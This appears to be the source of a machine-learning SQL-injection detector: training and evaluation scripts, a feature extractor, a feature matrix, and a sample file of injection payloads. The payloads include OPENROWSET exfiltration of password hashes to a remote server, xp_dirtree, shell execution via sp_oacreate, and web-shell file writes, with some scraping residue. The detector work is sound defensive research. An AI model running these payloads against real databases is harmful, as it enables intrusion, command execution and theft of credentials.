1 name from bbs.dbo.sysobjects where xtype=U) 9 | ;exec master.dbo.sp_blank>_password null,jiaoniang$,1866574;-- 10 | :a or name like fff%;-- ffff。 11 | and 1<>(select count(email) from [user]);-- 12 | ;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;-- 13 | id=152 and exists(select * from aaa where aaa>5) 14 | insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2 15 | table2_blank>table1。IP 16 | insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2 17 | HASH_blank>hashsysxlogins。 18 | insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _blank>_sysxlogins) 19 | 1and 1=(Select IS_blank>_SRVROLEMEMBER(sysadmin));-- 20 | 
;insert dirs exec master.dbo.xp_blank>_dirtree c:\-- 21 | and 0<>(select top 1 paths from dirs)-- 22 | and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))-- 23 | ;create table dirs1(paths varchar(100), id int)-- 24 | ;insert dirs exec master.dbo.xp_blank>_dirtree e:\web-- 25 | and 0<>(select top 1 paths from dirs1)-- 26 | and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc) 27 | and 1=(Select Top 1 col_blank>_name(object_blank>_id(USER_blank>_LOGIN),1) from sysobjects) 。 28 | and 1=(select user_blank>_id from USER_blank>_LOGIN) 29 | and 0=(select user from USER_blank>_LOGIN where user>1) 30 | exec sp_blank>_oacreate wscript.shell, @o out 31 | exec sp_blank>_oamethod @o, run, NULL, notepad.exe 32 | ; declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, notepad.exe-- 33 | declare @o int, @f int, @t int, @ret int 34 | declare @line varchar(8000) 35 | exec sp_blank>_oacreate scripting.filesystemobject, @o out 36 | exec sp_blank>_oamethod @o, opentextfile, @f out, c:\boot.ini, 1 37 | exec @ret = sp_blank>_oamethod @f, readline, @line out 38 | exec sp_blank>_oacreate scripting.filesystemobject, @o out 39 | exec sp_blank>_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1 40 | exec @ret = sp_blank>_oamethod @f, writeline, NULL, 41 | exec sp_blank>_oacreate speech.voicetext, @o out 42 | exec sp_blank>_oamethod @o, register, NULL, foo, bar 43 | exec sp_blank>_oasetproperty @o, speed, 150 44 | exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528waitfor delay 00:00:05 45 | ; declare @o int, @ret int exec sp_blank>_oacreate speech.voicetext, @o out exec sp_blank>_oamethod @o, register, NULL, foo, bar exec sp_blank>_oasetproperty @o, speed, 150 exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05-- 46 | 1+and+1=1 47 | ');waitFor+Delay+'00:00:05' 48 | ') or 
'1'='1-- 49 | OR 1=1 50 | WHERE 1=1 AND 1=1 51 | ORDER BY 1-- 52 | RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' 53 | 54 | -------------------------------------------------------------------------------- /ML_for_SQL/data/sqltest_matrix.csv: -------------------------------------------------------------------------------- 1 | 56.000000,0.000000,0.000000,0.089286,0.160714,0.035714,0.000000,1.000000 2 | 31.000000,0.000000,0.000000,0.032258,0.129032,0.000000,0.000000,1.000000 3 | 30.000000,0.000000,0.000000,0.066667,0.133333,0.033333,0.000000,1.000000 4 | 75.000000,0.000000,0.000000,0.026667,0.093333,0.013333,0.000000,1.000000 5 | 61.000000,0.000000,0.000000,0.065574,0.147541,0.000000,0.000000,1.000000 6 | 112.000000,0.000000,0.508929,0.008929,0.071429,0.008929,0.000000,1.000000 7 | 28.000000,0.000000,0.000000,0.000000,0.035714,0.035714,0.000000,1.000000 8 | 64.000000,0.000000,0.015625,0.031250,0.125000,0.015625,0.000000,1.000000 9 | 62.000000,0.000000,0.000000,0.112903,0.032258,0.000000,0.000000,1.000000 10 | 29.000000,0.000000,0.000000,0.000000,0.172414,0.000000,0.034483,1.000000 11 | 43.000000,0.000000,0.000000,0.023256,0.093023,0.023256,0.000000,1.000000 12 | 107.000000,0.000000,0.000000,0.018692,0.130841,0.037383,0.000000,1.000000 13 | 48.000000,0.000000,0.000000,0.083333,0.145833,0.020833,0.000000,1.000000 14 | 109.000000,0.000000,0.165138,0.045872,0.100917,0.027523,0.000000,1.000000 15 | 22.000000,0.000000,0.090909,0.090909,0.000000,0.000000,0.000000,1.000000 16 | 142.000000,0.000000,0.197183,0.119718,0.063380,0.028169,0.000000,1.000000 17 | 26.000000,0.000000,0.153846,0.000000,0.000000,0.000000,0.000000,1.000000 18 | 124.000000,0.000000,0.225806,0.120968,0.048387,0.032258,0.000000,1.000000 19 | 52.000000,0.000000,0.307692,0.038462,0.038462,0.019231,0.000000,1.000000 20 | 52.000000,0.000000,0.000000,0.000000,0.076923,0.000000,0.000000,1.000000 21 | 39.000000,0.000000,0.000000,0.051282,0.153846,0.000000,0.000000,1.000000 22 | 
68.000000,0.000000,0.014706,0.029412,0.147059,0.000000,0.000000,1.000000 23 | 49.000000,0.000000,0.000000,0.081633,0.102041,0.000000,0.000000,1.000000 24 | 55.000000,0.000000,0.000000,0.000000,0.072727,0.000000,0.000000,1.000000 25 | 40.000000,0.000000,0.000000,0.075000,0.150000,0.000000,0.000000,1.000000 26 | 109.000000,0.000000,0.027523,0.055046,0.155963,0.018349,0.000000,1.000000 27 | 93.000000,0.000000,0.118280,0.032258,0.075269,0.010753,0.000000,1.000000 28 | 52.000000,0.000000,0.173077,0.019231,0.076923,0.019231,0.000000,1.000000 29 | 55.000000,0.000000,0.163636,0.036364,0.109091,0.018182,0.000000,1.000000 30 | 45.000000,0.000000,0.000000,0.000000,0.088889,0.000000,0.000000,1.000000 31 | 50.000000,0.000000,0.080000,0.000000,0.100000,0.000000,0.000000,1.000000 32 | 115.000000,0.000000,0.034783,0.000000,0.121739,0.000000,0.000000,1.000000 33 | 40.000000,0.000000,0.000000,0.000000,0.200000,0.000000,0.000000,1.000000 34 | 27.000000,0.000000,0.000000,0.148148,0.074074,0.000000,0.000000,1.000000 35 | 58.000000,0.000000,0.000000,0.000000,0.068966,0.000000,0.000000,1.000000 36 | 64.000000,0.000000,0.000000,0.015625,0.109375,0.000000,0.000000,1.000000 37 | 54.000000,0.000000,0.000000,0.000000,0.129630,0.018519,0.000000,1.000000 38 | 58.000000,0.000000,0.000000,0.000000,0.068966,0.000000,0.000000,1.000000 39 | 81.000000,0.000000,0.000000,0.012346,0.086420,0.000000,0.000000,1.000000 40 | 51.000000,0.000000,0.078431,0.000000,0.117647,0.019608,0.000000,1.000000 41 | 48.000000,0.000000,0.000000,0.000000,0.083333,0.000000,0.000000,1.000000 42 | 52.000000,0.000000,0.076923,0.000000,0.115385,0.000000,0.000000,1.000000 43 | 43.000000,0.000000,0.000000,0.069767,0.093023,0.000000,0.000000,1.000000 44 | 108.000000,0.000000,0.037037,0.083333,0.129630,0.000000,0.000000,1.000000 45 | 284.000000,0.000000,0.028169,0.042254,0.137324,0.000000,0.000000,1.000000 46 | 9.000000,0.000000,0.000000,0.333333,0.000000,0.111111,0.000000,1.000000 47 | 
# -*- coding: UTF-8 -*-
import re

# Compiled once at import time instead of once per input line.
_DIGIT_RE = re.compile(r'\d')
_UPPER_RE = re.compile(r'[A-Z]')

# Substrings counted on the lower-cased line for the keyword feature.
# NOTE(review): the list is reproduced exactly as the original counted it so
# that feature values stay identical to what earlier runs produced:
#   * 'version%20' is listed twice, so every occurrence counts double;
#   * 'unnion%20' looks like a typo for 'union%20';
#   * 'information schema' is the only entry without a '%20' suffix.
# Changing any of these alters the features, so retrain the models if you do.
_KEYWORDS = (
    'and%20', 'or%20', 'xor%20', 'sysobjects%20', 'version%20',
    'substr%20', 'len%20', 'substring%20', 'exists%20',
    'mid%20', 'asc%20', 'inner join%20', 'xp_cmdshell%20', 'version%20',
    'exec%20', 'having%20', 'unnion%20', 'order%20', 'information schema',
    'load_file%20', 'load data infile%20', 'into outfile%20',
    'into dumpfile%20',
)


def generate(odir, wdir, label):
    """Extract one feature row per non-blank line of *odir* and write it to *wdir*.

    Each output row has eight comma-separated ``%f`` fields:
    line length, keyword count, upper-case fraction, digit fraction,
    space fraction, special-character fraction, prefix-character fraction
    and *label*.

    Blank lines (after stripping whitespace) are skipped: they have no length
    to normalise by. Previously a blank first line raised ``NameError`` and
    any later blank line was written with the previous line's frequencies.

    Args:
        odir: path of the input file, one UTF-8 encoded sample per line.
        wdir: path of the feature matrix to (over)write.
        label: numeric class label appended to every row.

    Returns:
        *wdir*, so the call can be chained straight into a CSV reader.

    Raises:
        OSError: if either file cannot be opened.
        UnicodeDecodeError: if a line of *odir* is not valid UTF-8.
    """
    # Both handles are managed by ``with`` so the output is flushed and closed
    # even when decoding a line fails half-way through.
    with open(odir, 'rb') as src, open(wdir, 'w') as dst:
        for raw in src:
            line = raw.decode('utf-8').strip()
            if not line:
                continue

            # Digit and upper-case frequencies use the original casing.
            length = len(line)
            num_f = len(_DIGIT_RE.findall(line)) / length
            capital_f = len(_UPPER_RE.findall(line)) / length

            # Everything below works on the lower-cased text, as before.
            line = line.lower()
            low_len = len(line)

            key_num = sum(line.count(keyword) for keyword in _KEYWORDS)

            # Literal spaces plus URL-encoded spaces.
            space_f = (line.count(" ") + line.count("%20")) / low_len

            # NOTE(review): 'NULL' can never match here because the line is
            # already lower-cased, and '28%' was presumably meant to be '%28'
            # (URL-encoded '('). Both are kept unchanged to preserve the
            # existing feature values.
            special_f = (line.count("{") * 2 + line.count('28%') * 2
                         + line.count('NULL') + line.count('[')
                         + line.count('=') + line.count('?')) / low_len

            # Escape/encoding prefixes: backslash-x, '&', backslash-u, '%'.
            prefix_f = (line.count('\\x') + line.count('&')
                        + line.count('\\u') + line.count('%')) / low_len

            dst.write('%f,%f,%f,%f,%f,%f,%f,%f\n' % (
                low_len, key_num, capital_f, num_f,
                space_f, special_f, prefix_f, label))

    return wdir
# ==============================================================================
# /ML_for_SQL/sqlbys.py -- Gaussian naive Bayes
# Created on Mon Nov 20 19:06:57 2017, author: wf
# ==============================================================================
import numpy as np
import pandas as pd
from sklearn import metrics
from sklearn.naive_bayes import GaussianNB
from sklearn.model_selection import train_test_split
from featurepossess import generate
from sklearn.externals import joblib

# Build the per-class feature matrices (label 1 = SQL injection, 0 = normal).
sql_matrix = generate("./data/sqlnew.csv", "./data/sql_matrix.csv", 1)
nor_matrix = generate("./data/normal_less.csv", "./data/nor_matrix.csv", 0)

# The matrices have no header row. Reading them with header=None keeps the
# first sample of each file; the default would turn it into column names and
# silently drop it from the training data.
samples = pd.concat(
    [pd.read_csv(sql_matrix, header=None), pd.read_csv(nor_matrix, header=None)],
    ignore_index=True,
)
samples.to_csv("./data/all_matrix.csv", encoding="utf_8_sig", index=False, header=False)

arr = samples.values
data = np.delete(arr, -1, axis=1)  # every column except the trailing label
target = arr[:, -1]                # label column
# Random train/test split.
train_data, test_data, train_target, test_target = train_test_split(
    data, target, test_size=0.3, random_state=3)
# Model.
clf = GaussianNB()
clf.fit(train_data, train_target)
joblib.dump(clf, './file/bys.model')
print("bys.model has been saved to 'file/bys.model'")
y_pred = clf.predict(test_data)
print("y_pred:%s" % y_pred)
print("test_target:%s" % test_target)
# Verify
print('Precision:%.3f' % metrics.precision_score(y_true=test_target, y_pred=y_pred))  # precision
print('Recall:%.3f' % metrics.recall_score(y_true=test_target, y_pred=y_pred))  # recall
print(metrics.confusion_matrix(y_true=test_target, y_pred=y_pred))  # confusion matrix


# ==============================================================================
# /ML_for_SQL/sqlforestrandom.py -- random forest
# Created on Mon Nov 20 19:06:57 2017, author: wf
# ==============================================================================
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import metrics
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from featurepossess import generate
from sklearn.externals import joblib

# Build the per-class feature matrices (label 1 = SQL injection, 0 = normal).
sql_matrix = generate("./data/sqlnew.csv", "./data/sql_matrix.csv", 1)
nor_matrix = generate("./data/normal_less.csv", "./data/nor_matrix.csv", 0)

# header=None keeps the first sample of each header-less matrix; the default
# would consume it as column names.
samples = pd.concat(
    [pd.read_csv(sql_matrix, header=None), pd.read_csv(nor_matrix, header=None)],
    ignore_index=True,
)
samples.to_csv("./data/all_matrix.csv", encoding="utf_8_sig", index=False, header=False)

arr = samples.values
data = np.delete(arr, -1, axis=1)  # every column except the trailing label
target = arr[:, -1]                # label column
# Random train/test split.
train_data, test_data, train_target, test_target = train_test_split(
    data, target, test_size=0.3, random_state=3)
# Model.
clf = RandomForestClassifier(n_estimators=10, max_depth=2)
clf.fit(train_data, train_target)
joblib.dump(clf, './file/forestrandom.model')
print("forestrandom.model has been saved to 'file/forestrandom.model'")
y_pred = clf.predict(test_data)
print("y_pred:%s" % y_pred)
print("test_target:%s" % test_target)
# Verify
print('Precision:%.3f' % metrics.precision_score(y_true=test_target, y_pred=y_pred))  # precision
print('Recall:%.3f' % metrics.recall_score(y_true=test_target, y_pred=y_pred))  # recall
print(metrics.confusion_matrix(y_true=test_target, y_pred=y_pred))  # confusion matrix


# ==============================================================================
# /ML_for_SQL/sqlkNN.py -- k-nearest neighbours
# Created on Mon Nov 20 19:06:57 2017, author: wf
# ==============================================================================
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import metrics
from sklearn import neighbors
from sklearn.model_selection import train_test_split
from featurepossess import generate
from sklearn.externals import joblib

# Build the per-class feature matrices (label 1 = SQL injection, 0 = normal).
sql_matrix = generate("./data/sqlnew.csv", "./data/sql_matrix.csv", 1)
nor_matrix = generate("./data/normal_less.csv", "./data/nor_matrix.csv", 0)

# header=None keeps the first sample of each header-less matrix; the default
# would consume it as column names.
samples = pd.concat(
    [pd.read_csv(sql_matrix, header=None), pd.read_csv(nor_matrix, header=None)],
    ignore_index=True,
)
samples.to_csv("./data/all_matrix.csv", encoding="utf_8_sig", index=False, header=False)

arr = samples.values
data = np.delete(arr, -1, axis=1)  # every column except the trailing label
target = arr[:, -1]                # label column
# Random train/test split.
train_data, test_data, train_target, test_target = train_test_split(
    data, target, test_size=0.3, random_state=3)
# Model.
clf = neighbors.KNeighborsClassifier(algorithm='ball_tree')
clf.fit(train_data, train_target)
joblib.dump(clf, './file/knn.model')
print("knn.model has been saved to 'file/knn.model'")
y_pred = clf.predict(test_data)
print("y_pred:%s" % y_pred)
print("test_target:%s" % test_target)
# Verify
print('Precision:%.3f' % metrics.precision_score(y_true=test_target, y_pred=y_pred))  # precision
print('Recall:%.3f' % metrics.recall_score(y_true=test_target, y_pred=y_pred))  # recall
print(metrics.confusion_matrix(y_true=test_target, y_pred=y_pred))  # confusion matrix


# ==============================================================================
# /ML_for_SQL/sqllogistic.py -- logistic regression
# Created on Mon Nov 20 19:06:57 2017, author: wf
# ==============================================================================
import numpy as np
import pandas as pd
from sklearn import metrics
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from featurepossess import generate
from sklearn.externals import joblib

# Build the per-class feature matrices (label 1 = SQL injection, 0 = normal).
sql_matrix = generate("./data/sqlnew.csv", "./data/sql_matrix.csv", 1)
nor_matrix = generate("./data/normal_less.csv", "./data/nor_matrix.csv", 0)

# header=None keeps the first sample of each header-less matrix; the default
# would consume it as column names.
samples = pd.concat(
    [pd.read_csv(sql_matrix, header=None), pd.read_csv(nor_matrix, header=None)],
    ignore_index=True,
)
samples.to_csv("./data/all_matrix.csv", encoding="utf_8_sig", index=False, header=False)

arr = samples.values
data = np.delete(arr, -1, axis=1)  # every column except the trailing label
target = arr[:, -1]                # label column
# Random train/test split.
train_data, test_data, train_target, test_target = train_test_split(
    data, target, test_size=0.3, random_state=3)
# Model.
clf = LogisticRegression()
clf.fit(train_data, train_target)
joblib.dump(clf, './file/lg.model')
print("lg.model has been saved to 'file/lg.model'")
y_pred = clf.predict(test_data)
print("y_pred:%s" % y_pred)
print("test_target:%s" % test_target)
# Verify
print('Precision:%.3f' % metrics.precision_score(y_true=test_target, y_pred=y_pred))  # precision
print('Recall:%.3f' % metrics.recall_score(y_true=test_target, y_pred=y_pred))  # recall
print(metrics.confusion_matrix(y_true=test_target, y_pred=y_pred))  # confusion matrix


# ==============================================================================
# /ML_for_SQL/sqlsvm.py -- support vector machine (RBF kernel)
# Created on Mon Oct 30 20:00:50 2017, author: wf
# ==============================================================================
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import metrics
from sklearn.svm import SVC
from sklearn.model_selection import train_test_split
from featurepossess import generate
from sklearn.externals import joblib

# Build the per-class feature matrices (label 1 = SQL injection, 0 = normal).
sql_matrix = generate("./data/sqlnew.csv", "./data/sql_matrix.csv", 1)
nor_matrix = generate("./data/normal_less.csv", "./data/nor_matrix.csv", 0)

# header=None keeps the first sample of each header-less matrix; the default
# would consume it as column names.
samples = pd.concat(
    [pd.read_csv(sql_matrix, header=None), pd.read_csv(nor_matrix, header=None)],
    ignore_index=True,
)
samples.to_csv("./data/all_matrix.csv", encoding="utf_8_sig", index=False, header=False)

arr = samples.values
data = np.delete(arr, -1, axis=1)  # every column except the trailing label
target = arr[:, -1]                # label column
# Random train/test split (this script uses random_state=8, unlike the others).
train_data, test_data, train_target, test_target = train_test_split(
    data, target, test_size=0.3, random_state=8)
# Model: probability estimates are left at their default (off).
clf = SVC(kernel='rbf')
clf.fit(train_data, train_target)
joblib.dump(clf, './file/svm.model')
print("svm.model has been saved to 'file/svm.model'")
y_pred = clf.predict(test_data)
print("y_pred:%s" % y_pred)
print("test_target:%s" % test_target)
# Verify
print('Precision:%.3f' % metrics.precision_score(y_true=test_target, y_pred=y_pred))  # precision
print('Recall:%.3f' % metrics.recall_score(y_true=test_target, y_pred=y_pred))  # recall
print(metrics.confusion_matrix(y_true=test_target, y_pred=y_pred))  # confusion matrix
# NOTE: the original carried a disabled F1 / ROC / AUC plotting section, with a
# remark that the curve was wrong because it only had three points. It was fed
# the hard class predictions (y_pred) as scores.
# -*- coding: utf-8 -*-
"""
Created on Tue Nov  7 14:40:05 2017

@author: wf

Train a depth-1 decision tree on the SQL-injection / normal feature matrices,
save it to ./file/tree.model and print precision, recall and the confusion
matrix on a 30% hold-out split.
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import metrics
from sklearn import tree
from sklearn.model_selection import train_test_split
from featurepossess import generate
from sklearn.externals import joblib

# Build the per-class feature matrices (label 1 = SQL injection, 0 = normal).
sql_matrix = generate("./data/sqlnew.csv", "./data/sql_matrix.csv", 1)
nor_matrix = generate("./data/normal_less.csv", "./data/nor_matrix.csv", 0)

# The matrices have no header row. Reading them with header=None keeps the
# first sample of each file; the default would turn it into column names and
# silently drop it from the training data.
samples = pd.concat(
    [pd.read_csv(sql_matrix, header=None), pd.read_csv(nor_matrix, header=None)],
    ignore_index=True,
)
samples.to_csv("./data/all_matrix.csv", encoding="utf_8_sig", index=False, header=False)

arr = samples.values
data = np.delete(arr, -1, axis=1)  # every column except the trailing label
target = arr[:, -1]                # label column
# Random train/test split.
train_data, test_data, train_target, test_target = train_test_split(
    data, target, test_size=0.3, random_state=3)
# Model.
clf = tree.DecisionTreeClassifier(criterion="entropy", max_depth=1)
clf.fit(train_data, train_target)
joblib.dump(clf, './file/tree.model')
print("tree.model has been saved to 'file/tree.model'")
y_pred = clf.predict(test_data)
print("y_pred:%s" % y_pred)
print("test_target:%s" % test_target)
# Verify
print('Precision:%.3f' % metrics.precision_score(y_true=test_target, y_pred=y_pred))  # precision
print('Recall:%.3f' % metrics.recall_score(y_true=test_target, y_pred=y_pred))  # recall
print(metrics.confusion_matrix(y_true=test_target, y_pred=y_pred))  # confusion matrix
# -*- coding: utf-8 -*-
"""
Created on Mon Oct 30 20:00:50 2017

@author: wf

Interactively load a saved model from ./file/ and evaluate it on the test
samples under ./data/.
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import metrics
from sklearn.svm import SVC
from sklearn.model_selection import train_test_split
from featurepossess import generate
from sklearn.externals import joblib


def test_c(flag, sql_flag):
    """Build the feature matrix for the requested test set and return its path.

    Args:
        flag: ``'1'`` to test a single sample file; anything else tests both.
        sql_flag: with ``flag == '1'``, ``'0'`` selects the normal samples and
            ``'1'`` the SQL-injection samples. Ignored otherwise.

    Returns:
        Path of the CSV feature matrix to evaluate (no header row, label in
        the last column).
    """
    sql_dir = "./data/sql_test.csv"
    nor_dir = "./data/normal_test.csv"
    allm_dir = "./data/alltest_matrix.csv"
    if flag == '1' and sql_flag == '0':
        # Write to the *test* matrix. The original wrote ./data/nor_matrix.csv,
        # the file the training scripts use for their training matrix.
        return generate(nor_dir, "./data/nortest_matrix.csv", 0)
    if flag == '1' and sql_flag == '1':
        return generate(sql_dir, "./data/sqltest_matrix.csv", 1)

    sql_matrix = generate(sql_dir, "./data/sqltest_matrix.csv", 1)
    nor_matrix = generate(nor_dir, "./data/nortest_matrix.csv", 0)
    # header=None keeps the first sample of each header-less matrix; the
    # default would consume it as column names and drop it.
    combined = pd.concat(
        [pd.read_csv(sql_matrix, header=None), pd.read_csv(nor_matrix, header=None)],
        ignore_index=True,
    )
    combined.to_csv(allm_dir, encoding="utf_8_sig", index=False, header=False)
    return allm_dir


def test_data(allm_dir):
    """Load a feature matrix and split it into features and labels.

    Args:
        allm_dir: path of a header-less CSV matrix as returned by ``test_c``.

    Returns:
        ``(features, labels)``: all columns but the last, and the last column.
    """
    # utf_8_sig accepts files with or without a BOM, so both the combined
    # matrix (written with a BOM) and a single-class matrix load correctly.
    feature_max = pd.read_csv(allm_dir, header=None, encoding="utf_8_sig")
    arr = feature_max.values
    features = np.delete(arr, -1, axis=1)  # drop the trailing label column
    labels = arr[:, -1]
    return features, labels


if __name__ == "__main__":
    while True:
        # Prompt: name of the model file to load from ./file/.
        model_name = input("请输入要选择的模型名称:")
        # NOTE(security): joblib.load unpickles the file, which can execute
        # arbitrary code. Only load model files from a trusted source.
        clf = joblib.load('./file/' + model_name)
        print(model_name, " has been loaded")
        # Prompt: number of test files ('1' = single class, otherwise both).
        flag = input("请输入测试文件个数:")
        # Prompt: sample type ('0' = normal, '1' = SQL injection).
        sql_flag = input("请输入样本类型:")
        mode = test_c(flag, sql_flag)
        # Use fresh names here: rebinding ``test_data`` to the returned array
        # made the second loop iteration fail with "object is not callable".
        features, labels = test_data(mode)
        y_pred = clf.predict(features)
        print("y_pred:%s" % y_pred)
        print("test_target:%s" % labels)
        # Verify
        print('Precision:%.3f' % metrics.precision_score(y_true=labels, y_pred=y_pred))  # precision
        print('Recall:%.3f' % metrics.recall_score(y_true=labels, y_pred=y_pred))  # recall
        print(metrics.confusion_matrix(y_true=labels, y_pred=y_pred))  # confusion matrix